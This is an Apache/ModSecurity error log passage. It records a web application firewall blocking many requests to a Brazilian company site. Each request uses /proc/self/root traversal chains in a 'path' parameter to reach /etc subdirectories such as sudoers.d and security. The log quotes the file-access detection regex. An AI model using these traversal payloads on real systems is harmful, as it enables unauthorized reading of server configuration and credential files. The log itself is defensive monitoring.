[hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwTeoXxyEfFpUF8f9WLQAAAUM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:27.101110 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.241.31:54192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwTvqxLDW4GITHUkS0UgAAAQ4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:27.101399 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:46266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwTjJ3M9BSuKP7CAbiugAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:28.554991 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:46270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwUPXLqtnMIWvjpaJrkwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:28.759160 2026] [:error] [pid 9818:tid 140411590858496] [client 74.7.241.31:36554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwUF1pVZ5mVmJwsFMDrAAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:29.049563 2026] [:error] [pid 26799:tid 140411540502272] [client 74.7.243.128:46276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwUda6ubjKNq_cu4ahOgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:30.087613 2026] [:error] [pid 7893:tid 140411725141760] [client 74.7.241.31:36568] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwUhCii7xarUs8iHY22wAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:30.763637 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.243.128:57268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwUuoXxyEfFpUF8f9WNwAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:32.327195 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.243.128:57274] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwVAF0L0L-SsrnPo46pAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:35.267110 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:36576] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwVxCii7xarUs8iHY24QAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:40.182861 2026] [:error] [pid 7235:tid 140411582465792] [client 74.7.243.128:57286] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwWvqxLDW4GITHUkS0WwAAARM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:41.850965 2026] [:error] [pid 9818:tid 140411582465792] [client 74.7.243.128:59798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwXV1pVZ5mVmJwsFMDtwAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:43.223935 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:59808] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwXzJ3M9BSuKP7CAbiwgAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:44.038513 2026] [:error] [pid 11167:tid 140411683178240] [client 74.7.241.31:36580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwYPHIg5MgXLBnicPOLAAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:44.464130 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.243.128:59816] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwYBCii7xarUs8iHY27QAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:45.783110 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:59832] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwYTJ3M9BSuKP7CAbiwwAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:47.113147 2026] [:error] [pid 11167:tid 140411658000128] [client 74.7.243.128:59842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwY_HIg5MgXLBnicPOLQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:48.502734 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.243.128:59850] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwZPHIg5MgXLBnicPOLgAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:49.835358 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.243.128:45558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwZRCii7xarUs8iHY28gAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:51.003293 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.241.31:36992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwZ_qxLDW4GITHUkS0ZwAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:59:51.191157 2026] [:error] [pid 7235:tid 140411641214720] [client 74.7.243.128:45574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwZ_qxLDW4GITHUkS0aAAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:52.506733 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:45578] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzwaPHIg5MgXLBnicPOMQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:59:53.771668 2026] [:error] [pid 11642:tid 140411699963648] [client 74.7.243.128:45588] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 